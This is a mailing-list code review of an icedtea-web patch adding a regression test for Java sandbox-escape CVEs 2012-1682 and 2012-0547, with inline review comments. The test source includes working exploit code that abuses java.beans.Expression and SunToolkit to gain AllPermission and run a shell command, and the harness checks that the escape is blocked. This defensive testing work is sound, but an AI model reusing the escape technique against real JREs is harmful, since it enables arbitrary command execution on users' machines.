[rfc][icedtea-web] Reproducer of BeansStatement behaviour

Adam Domurad adomurad at redhat.com
Fri Dec 14 12:58:47 PST 2012


On 12/13/2012 11:35 AM, Jiri Vanek wrote:
> Ok for head?
>
> J.

I'm assuming this is OK for the repo since this has been made public 
before. To be exact though, this is testing a property of the JRE.

> diff -r 855087771e7e 
> tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploit.html
> --- /dev/null    Thu Jan 01 00:00:00 1970 +0000
> +++ 
> b/tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploit.html 
>  Mon Sep 03 16:04:41 2012 +0200
> @@ -0,0 +1,42 @@
> +<!--
> +
> +This file is part of IcedTea.
> +
> +IcedTea is free software; you can redistribute it and/or modify
> +it under the terms of the GNU General Public License as published by
> +the Free Software Foundation; either version 2, or (at your option)
> +any later version.
> +
> +IcedTea is distributed in the hope that it will be useful, but
> +WITHOUT ANY WARRANTY; without even the implied warranty of
> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
> +General Public License for more details.
> +
> +You should have received a copy of the GNU General Public License
> +along with IcedTea; see the file COPYING.  If not, write to the
> +Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, 
> Boston, MA
> +02110-1301 USA.
> +
> +Linking this library statically or dynamically with other modules is
> +making a combined work based on this library.  Thus, the terms and
> +conditions of the GNU General Public License cover the whole
> +combination.
> +
> +As a special exception, the copyright holders of this library give you
> +permission to link this library with independent modules to produce an
> +executable, regardless of the license terms of these independent
> +modules, and to copy and distribute the resulting executable under
> +terms of your choice, provided that you also meet, for each linked
> +independent module, the terms and conditions of the license of that
> +module.  An independent module is a module which is not derived from
> +or based on this library.  If you modify this library, you may extend
> +this exception to your version of the library, but you are not
> +obligated to do so.  If you do not wish to do so, delete this
> +exception statement from your version.
> +
> + -->
> +<html><head></head><body bgcolor="blue">
> +<p><applet code="GondvvMinimal2.class" 
> archive="BeansStatementExploit.jar" codebase="." width="100" height="20">
> +</applet></p>
> +</body>
> +</html>
> diff -r 855087771e7e 
> tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploitApplet.jnlp

Maybe 'BeansStatementBreakSandbox' would be a bit clearer.

> --- /dev/null    Thu Jan 01 00:00:00 1970 +0000
> +++ 
> b/tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploitApplet.jnlp 
>  Mon Sep 03 16:04:41 2012 +0200
> @@ -0,0 +1,61 @@
> +<!--
> +
> +This file is part of IcedTea.
> +
> +IcedTea is free software; you can redistribute it and/or modify
> +it under the terms of the GNU General Public License as published by
> +the Free Software Foundation; either version 2, or (at your option)
> +any later version.
> +
> +IcedTea is distributed in the hope that it will be useful, but
> +WITHOUT ANY WARRANTY; without even the implied warranty of
> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
> +General Public License for more details.
> +
> +You should have received a copy of the GNU General Public License
> +along with IcedTea; see the file COPYING.  If not, write to the
> +Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, 
> Boston, MA
> +02110-1301 USA.
> +
> +Linking this library statically or dynamically with other modules is
> +making a combined work based on this library.  Thus, the terms and
> +conditions of the GNU General Public License cover the whole
> +combination.
> +
> +As a special exception, the copyright holders of this library give you
> +permission to link this library with independent modules to produce an
> +executable, regardless of the license terms of these independent
> +modules, and to copy and distribute the resulting executable under
> +terms of your choice, provided that you also meet, for each linked
> +independent module, the terms and conditions of the license of that
> +module.  An independent module is a module which is not derived from
> +or based on this library.  If you modify this library, you may extend
> +this exception to your version of the library, but you are not
> +obligated to do so.  If you do not wish to do so, delete this
> +exception statement from your version.
> +
> + -->
> +<?xml version="1.0" encoding="utf-8"?>
> +<jnlp spec="1.0" href="BeansStatementExploitApplet.jnlp" codebase=".">
> +    <information>
> +        <title>BeansStatementExploitApplet</title>
> +        <vendor>IcedTea</vendor>
> +        <homepage 
> href="http://icedtea.classpath.org/wiki/IcedTea-Web#Testing_IcedTea-Web"/>
> + <description>BeansStatementExploitApplet</description>
> +        <offline/>
> +    </information>
> +    <resources>
> +        <j2se version="1.6+"/>
> +        <jar href="BeansStatementExploit.jar"/>
> +    </resources>
> +    <applet-desc
> +      documentBase="."
> +      name="BeansStatementExploitApplet"
> +      main-class="GondvvMinimal2"
> +      width="100"
> +      height="100">
> +    </applet-desc>
> +</jnlp>
> +
> +
> +</applet-desc>
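Review bot: the trailing `</applet-desc>` on the last line of this file, after `</jnlp>` has already closed the root element, makes the document not well-formed XML (the `<applet-desc>` element was already closed inside `<jnlp>`); drop it together with the two blank lines before it. In the same file the `<?xml version="1.0" encoding="utf-8"?>` declaration comes after the license comment, but an XML declaration is only permitted as the very first thing in a document, so a strict parser will reject the file; move the license comment below the declaration. Minor: the `<description>` line is indented with a single space unlike its siblings.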
> diff -r 855087771e7e 
> tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploitWS.jnlp
> --- /dev/null    Thu Jan 01 00:00:00 1970 +0000
> +++ 
> b/tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploitWS.jnlp 
>  Mon Sep 03 16:04:41 2012 +0200
> @@ -0,0 +1,56 @@
> +<!--
> +
> +This file is part of IcedTea.
> +
> +IcedTea is free software; you can redistribute it and/or modify
> +it under the terms of the GNU General Public License as published by
> +the Free Software Foundation; either version 2, or (at your option)
> +any later version.
> +
> +IcedTea is distributed in the hope that it will be useful, but
> +WITHOUT ANY WARRANTY; without even the implied warranty of
> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
> +General Public License for more details.
> +
> +You should have received a copy of the GNU General Public License
> +along with IcedTea; see the file COPYING.  If not, write to the
> +Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, 
> Boston, MA
> +02110-1301 USA.
> +
> +Linking this library statically or dynamically with other modules is
> +making a combined work based on this library.  Thus, the terms and
> +conditions of the GNU General Public License cover the whole
> +combination.
> +
> +As a special exception, the copyright holders of this library give you
> +permission to link this library with independent modules to produce an
> +executable, regardless of the license terms of these independent
> +modules, and to copy and distribute the resulting executable under
> +terms of your choice, provided that you also meet, for each linked
> +independent module, the terms and conditions of the license of that
> +module.  An independent module is a module which is not derived from
> +or based on this library.  If you modify this library, you may extend
> +this exception to your version of the library, but you are not
> +obligated to do so.  If you do not wish to do so, delete this
> +exception statement from your version.
> +
> + -->
> +<?xml version="1.0" encoding="utf-8"?>
> +<jnlp spec="1.0" href="BeansStatementExploitWS.jnlp" codebase=".">
> +    <information>
> +        <title>BeansStatementExploitWS</title>
> +        <vendor>IcedTea</vendor>
> +        <homepage 
> href="http://icedtea.classpath.org/wiki/IcedTea-Web#Testing_IcedTea-Web"/>
> + <description>BeansStatementExploitWS</description>
> +        <offline/>
> +    </information>
> +    <resources>
> +        <j2se version="1.6+"/>
> +        <jar href="BeansStatementExploit.jar"/>
> +    </resources>
> +  <application-desc main-class="GondvvTestcase4">
> +  </application-desc>
> +</jnlp>
> +
> +
> +</applet-desc>
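Review bot: the same two well-formedness problems as in the applet JNLP: a dangling `</applet-desc>` after the closing `</jnlp>` (this file does not even contain an `<applet-desc>`; it uses `<application-desc>`), and the XML declaration placed after the license comment instead of at the start of the file. Both JNLP files look copied from one template, so fixing the template and regenerating them is the cleanest way to address it.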
> diff -r 855087771e7e 
> tests/reproducers/simple/BeansStatementExploit/srcs/GondvvMinimal2.java
> --- /dev/null    Thu Jan 01 00:00:00 1970 +0000
> +++ 
> b/tests/reproducers/simple/BeansStatementExploit/srcs/GondvvMinimal2.java 
>  Mon Sep 03 16:04:41 2012 +0200
> @@ -0,0 +1,49 @@
> +/* GondvvMinimal2.java
> +Copyright (C) 2011 Red Hat, Inc.
> +
> +This file is part of IcedTea.
> +
> +IcedTea is free software; you can redistribute it and/or
> +modify it under the terms of the GNU General Public License as 
> published by
> +the Free Software Foundation, version 2.
> +
> +IcedTea is distributed in the hope that it will be useful,
> +but WITHOUT ANY WARRANTY; without even the implied warranty of
> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
> +General Public License for more details.
> +
> +You should have received a copy of the GNU General Public License
> +along with IcedTea; see the file COPYING.  If not, write to
> +the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, 
> Boston, MA
> +02110-1301 USA.
> +
> +Linking this library statically or dynamically with other modules is
> +making a combined work based on this library.  Thus, the terms and
> +conditions of the GNU General Public License cover the whole
> +combination.
> +
> +As a special exception, the copyright holders of this library give you
> +permission to link this library with independent modules to produce an
> +executable, regardless of the license terms of these independent
> +modules, and to copy and distribute the resulting executable under
> +terms of your choice, provided that you also meet, for each linked
> +independent module, the terms and conditions of the license of that
> +module.  An independent module is a module which is not derived from
> +or based on this library.  If you modify this library, you may extend
> +this exception to your version of the library, but you are not
> +obligated to do so.  If you do not wish to do so, delete this
> +exception statement from your version.
> + */
> +
> +import java.applet.Applet;
> +
> +
> +public class GondvvMinimal2 extends Applet {

I understand why you chose this name, but I would prefer something more 
descriptive of the intent of the applet.

> +
> +    @Override
> +    public void init() {
> +    GondvvTestcase4.main(new String[0]);
> +
> +    }
> +
> +}
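Review bot: the body of `init()` is mis-indented (`GondvvTestcase4.main(new String[0]);` sits at the same level as the method header), and the empty `args` array it passes is ignored anyway, because `GondvvTestcase4.main` unconditionally reassigns `args` to `{"/bin/date"}`; either drop the pretence of passing arguments or make `main` honour them. A one-line class comment stating that this applet only runs the testcase inside the applet sandbox so its output can be compared with the javaws runs would also help, given that the class name says nothing about its purpose.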
> diff -r 855087771e7e 
> tests/reproducers/simple/BeansStatementExploit/srcs/GondvvTestcase4.java
> --- /dev/null    Thu Jan 01 00:00:00 1970 +0000
> +++ 
> b/tests/reproducers/simple/BeansStatementExploit/srcs/GondvvTestcase4.java 
>  Mon Sep 03 16:04:41 2012 +0200
> @@ -0,0 +1,181 @@
> +/* GondvvTestcase4.java
> +Copyright (C) 2011 Red Hat, Inc.
> +
> +This file is part of IcedTea.
> +
> +IcedTea is free software; you can redistribute it and/or
> +modify it under the terms of the GNU General Public License as 
> published by
> +the Free Software Foundation, version 2.
> +
> +IcedTea is distributed in the hope that it will be useful,
> +but WITHOUT ANY WARRANTY; without even the implied warranty of
> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
> +General Public License for more details.
> +
> +You should have received a copy of the GNU General Public License
> +along with IcedTea; see the file COPYING.  If not, write to
> +the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, 
> Boston, MA
> +02110-1301 USA.
> +
> +Linking this library statically or dynamically with other modules is
> +making a combined work based on this library.  Thus, the terms and
> +conditions of the GNU General Public License cover the whole
> +combination.
> +
> +As a special exception, the copyright holders of this library give you
> +permission to link this library with independent modules to produce an
> +executable, regardless of the license terms of these independent
> +modules, and to copy and distribute the resulting executable under
> +terms of your choice, provided that you also meet, for each linked
> +independent module, the terms and conditions of the license of that
> +module.  An independent module is a module which is not derived from
> +or based on this library.  If you modify this library, you may extend
> +this exception to your version of the library, but you are not
> +obligated to do so.  If you do not wish to do so, delete this
> +exception statement from your version.
> + */
> +
> +import java.beans.Statement;
> +import java.beans.Expression;
> +
> +import java.lang.reflect.Field;
> +import java.net.URL;
> +import java.security.*;
> +import java.security.cert.Certificate;
> +import java.io.InputStreamReader;
> +import java.io.BufferedReader;
> +
> +/**
> + *
> + * Summary for @
> + * http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1682
> + * and
> + * http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0547
> + */
> +public class GondvvTestcase4 {
> +
> +    public static int runproc(Process proc) throws Exception {
> +        BufferedReader cmdout = new BufferedReader(new 
> InputStreamReader(proc.getInputStream()));
> +        String line;
> +        while ((line = cmdout.readLine()) != null) {
> +            System.out.println(line);
> +        }
> +        proc.waitFor();
> +        return proc.exitValue();
> +    }
> +
> +    public static void runcommand_exploit(String cmd) throws Exception {
> +        Expression exec_ex = new Expression(Runtime.getRuntime(), 
> "exec", new String[]{cmd});
> +
> +        Permissions perms = new Permissions();
> +        perms.add(new AllPermission());
> +        ProtectionDomain protdomain = new ProtectionDomain(
> +                new CodeSource(new URL("file:///"), new 
> Certificate[0]), perms);
> +        AccessControlContext acc = new AccessControlContext(new 
> ProtectionDomain[]{protdomain});
> +
> +        Expression tmp_ex = new Expression(Class.class, "forName", 
> new Object[]{"sun.awt.SunToolkit"});
> +        tmp_ex.execute();
> +        Class toolkit = (Class) tmp_ex.getValue();
> +
> +        tmp_ex = new Expression(toolkit, "getField", new 
> Object[]{Statement.class, "acc"});
> +        tmp_ex.execute();
> +        ((Field) tmp_ex.getValue()).set(exec_ex, acc);
> +        exec_ex.execute();
> +
> +        runproc((Process) exec_ex.getValue());
> +    }
> +
> +    public static void runcommand_direct(String cmd) throws Exception {
> +        runproc(Runtime.getRuntime().exec(cmd));
> +    }
> +
> +    public static void main(String[] args) {
> +        System.out.println("Running GondvvTest");
> +        args = new String[]{"/bin/date"};
> +        try {
> +            System.out.println("Directly calling: 
> Class.forName(\"sun.awt.SunToolkit\")");
> +
> +            Object cl = Class.forName("sun.awt.SunToolkit");
> +            System.out.println("FAIL: " + cl.toString());
> +        } catch (AccessControlException e) {
> +            System.out.println("OK: got expected: " + e.toString());
> +        } catch (Exception e) {
> +            System.out.println("FAIL: unexpected exception: " + 
> e.toString());
> +            e.printStackTrace();
> +        }
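Review bot: `runproc` drains only the child's stdout and never its stderr, so a child that writes more than the pipe buffer to stderr before exiting will block in `proc.waitFor()`; use `ProcessBuilder` with `redirectErrorStream(true)` or read both streams. Separately, the first statement of `main`, `args = new String[]{"/bin/date"};`, silently discards whatever the caller passed and hard-codes a Linux path; on a host without `/bin/date` the "direct" run throws an `IOException`, which the catch below reports as `FAIL: unexpected exception`, so the test would fail for a reason unrelated to the sandbox. Consider defaulting to `/bin/date` only when no argument is given, and documenting the platform assumption. The class javadoc `Summary for @` also reads as an unfinished sentence.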

Can you move the FAIL/OK checks into the testcase class possibly? I 
guess it's OK as it is, but if you can make the testcase do more checking 
and not just checking for FAIL it would be good.

> +        System.out.println();
> +
> +
> +        try {
> +            System.out.println("Calling: Expression(Class.class, 
> \"forName\", new String[]{\"sun.awt.SunToolkit\"})");
> +
> +            Expression ex = new Expression(Class.class, "forName", 
> new String[]{"sun.awt.SunToolkit"});
> +            ex.execute();
> +            Object cl = ex.getValue();
> +            System.out.println("FAIL: " + cl.toString());
> +            System.out.println();
> +            System.out.println("Checking if SunToolkit class 
> reference is usable");
> +            try {
> +                ex = new Expression(cl, "getField", new 
> Object[]{Byte.class, "SIZE"});
> +                ex.execute();
> +                System.out.println("FAIL: " + ex.getValue().toString());
> +            } catch (NoSuchMethodException e) {
> +                System.out.println("INFO: " + e.toString());
> +                e.printStackTrace();
> +            } catch (Exception e) {
> +                System.out.println("FAIL: unexpected exception: " + 
> e.toString());
> +                e.printStackTrace();
> +            }
> +
> +            try {
> +                ex = new Expression(cl, "getField", new 
> Object[]{Statement.class, "acc"});
> +                ex.execute();
> +                System.out.println("FAIL: " + ex.getValue().toString());
> +            } catch (NoSuchMethodException e) {
> +                System.out.println("INFO: " + e.toString());
> +                e.printStackTrace();
> +            } catch (Exception e) {
> +                System.out.println("FAIL: unexpected exception: " + 
> e.toString());
> +                e.printStackTrace();
> +            }
> +        } catch (AccessControlException e) {
> +            System.out.println("OK: got expected: " + e.toString());
> +        } catch (Exception e) {
> +            System.out.println("FAIL: unexpected exception: " + 
> e.toString());
> +            e.printStackTrace();
> +        }
> +        System.out.println();
> +
> +        if (args.length == 0) {
> +        }
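Review bot: the empty `if (args.length == 0) { }` at the end of this region is dead code: `args` was reassigned to a one-element array at the top of `main`, so the condition can never hold, and the block does nothing even if it could; remove it, or, if the intent was to default to `/bin/date` only when no argument is supplied, move the reassignment inside this block. Also, the inner `catch (NoSuchMethodException e)` branches print `INFO:` but are only reachable after `FAIL:` has already been printed for the `Class.forName` result, so they never change the verdict; a comment marking them as diagnostic output only would avoid confusion.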

??

> +
> +        try {
> +            System.out.println("Running command directly: " + args[0]);
> +            runcommand_direct(args[0]);
> +            System.out.println("FAIL: commnad was run");
> +        } catch (AccessControlException e) {
> +            System.out.println("OK: got expected: " + e.toString());
> +        } catch (Exception e) {
> +            System.out.println("FAIL: unexpected exception: " + 
> e.toString());
> +            e.printStackTrace();
> +        }
> +        System.out.println();
> +
> +        try {
> +            System.out.println("Running command using exploit: " + 
> args[0]);
> +            runcommand_exploit(args[0]);
> +            System.out.println("FAIL: commnad was run");
> +        } catch (AccessControlException e) {
> +            System.out.println("OK: got expected: " + e.toString());
> +        } catch (NoSuchMethodException e) {
> +            System.out.println("FAIL: " + e.toString());
> +            e.printStackTrace();
> +        } catch (Exception e) {
> +            System.out.println("FAIL: unexpected exception: " + 
> e.toString());
> +            e.printStackTrace();
> +        }
> +        System.out.println();
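Review bot: `"FAIL: commnad was run"` is misspelled in both `println` calls in this region (`commnad` should be `command`); the `FAIL:` prefix is what `evaluate()` in the test class greps for, so the message text should at least read correctly. More substantively, the exploit-path block reports `NoSuchMethodException` as `FAIL:`, yet on a JRE that has removed `sun.awt.SunToolkit.getField` while still permitting the `Expression`-based `Class.forName`, the method lookup fails before any command is run, and this test would then wrongly report that the sandbox was broken. Treat that case as a separate outcome (OK or INFO), and make the check positive by asserting that no `Process` object was ever obtained.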

Looks OK but again

> +
> +
> +    }
> +}
> diff -r 855087771e7e 
> tests/reproducers/simple/BeansStatementExploit/testcases/BeansStatementExploitTests.java
> --- /dev/null    Thu Jan 01 00:00:00 1970 +0000
> +++ 
> b/tests/reproducers/simple/BeansStatementExploit/testcases/BeansStatementExploitTests.java 
>  Mon Sep 03 16:04:41 2012 +0200
> @@ -0,0 +1,82 @@
> +/* BeansStatementExploitTests.java
> +Copyright (C) 2011 Red Hat, Inc.
> +
> +This file is part of IcedTea.
> +
> +IcedTea is free software; you can redistribute it and/or
> +modify it under the terms of the GNU General Public License as 
> published by
> +the Free Software Foundation, version 2.
> +
> +IcedTea is distributed in the hope that it will be useful,
> +but WITHOUT ANY WARRANTY; without even the implied warranty of
> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
> +General Public License for more details.
> +
> +You should have received a copy of the GNU General Public License
> +along with IcedTea; see the file COPYING.  If not, write to
> +the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, 
> Boston, MA
> +02110-1301 USA.
> +
> +Linking this library statically or dynamically with other modules is
> +making a combined work based on this library.  Thus, the terms and
> +conditions of the GNU General Public License cover the whole
> +combination.
> +
> +As a special exception, the copyright holders of this library give you
> +permission to link this library with independent modules to produce an
> +executable, regardless of the license terms of these independent
> +modules, and to copy and distribute the resulting executable under
> +terms of your choice, provided that you also meet, for each linked
> +independent module, the terms and conditions of the license of that
> +module.  An independent module is a module which is not derived from
> +or based on this library.  If you modify this library, you may extend
> +this exception to your version of the library, but you are not
> +obligated to do so.  If you do not wish to do so, delete this
> +exception statement from your version.
> + */
> +
> +import net.sourceforge.jnlp.ProcessResult;
> +import net.sourceforge.jnlp.annotations.Bug;
> +import net.sourceforge.jnlp.browsertesting.BrowserTest;
> +import net.sourceforge.jnlp.browsertesting.Browsers;
> +import net.sourceforge.jnlp.annotations.NeedsDisplay;
> +import net.sourceforge.jnlp.annotations.TestInBrowsers;
> +import org.junit.Assert;
> +
> +import org.junit.Test;
> +
> +public class BeansStatementExploitTests extends BrowserTest {
> +
> +    @Test
> +    @NeedsDisplay
> + 
> @Bug(id={"http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1682", "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0547"})
> +    public void BeansStatementExploitTestWS() throws Exception {
> +        ProcessResult pr = server.executeJavawsHeadless(null, 
> "/BeansStatementExploitWS.jnlp");
> +        evaluate(pr);
> +    }
> +
> +    @Test
> +    @NeedsDisplay
> + 
> @Bug(id={"http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1682", "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0547"})
> +    public void BeansStatementExploitTesWsApplet() throws Exception {
> +        ProcessResult pr = server.executeJavawsHeadless(null, 
> "/BeansStatementExploitApplet.jnlp");
> +        evaluate(pr);
> +    }
> +
> +    @Test
> +    @TestInBrowsers(testIn = {Browsers.all})
> +    @NeedsDisplay
> + 
> @Bug(id={"http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1682", "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0547"})
> +    public void BeansStatementExploitTestApplet() throws Exception {
> +        ProcessResult pr = 
> server.executeBrowser("/BeansStatementExploit.html");
> +        evaluate(pr);
> +        Assert.assertTrue(pr.wasTerminated);
> +    }
> +
> +    private void evaluate(ProcessResult pr) {
> +        Assert.assertTrue("Output of reproducerwas empty => it was 
> not run", (pr.stdout.length() > 0));
> +        Assert.assertTrue("Output of reproducerwas have not 
> contained  'Running GondvvTest' => it was not run", 
> (pr.stdout.contains("Running GondvvTest")));
> +        Assert.assertFalse("Output of reproducer contained FAIL, that 
> means that exploit have hacked your system", 
> (pr.stdout.contains("FAIL:")));
> +
> +    }
> +}
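Review bot: `evaluate()` only asserts that stdout is non-empty, contains `Running GondvvTest` and contains no `FAIL:`; a run that prints the banner and then dies with an uncaught `Error`, or is killed, before reaching the checks would pass. Assert positively on the expected `OK: got expected:` lines (the reproducer emits four, one per check) rather than only on the absence of `FAIL:`. Also fix the typos in the assertion messages (`reproducerwas`, `have not contained`, the doubled space) and the test method name `BeansStatementExploitTesWsApplet` (missing `t`), and consider checking `pr.wasTerminated` or the exit status for the two javaws runs as well, not only for the browser run.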

Looks OK, although this seems like something that is better placed in a 
JRE's test suite, not ITW's. I have no problems with it going in the 
repo, though.

Happy hacking,
-Adam


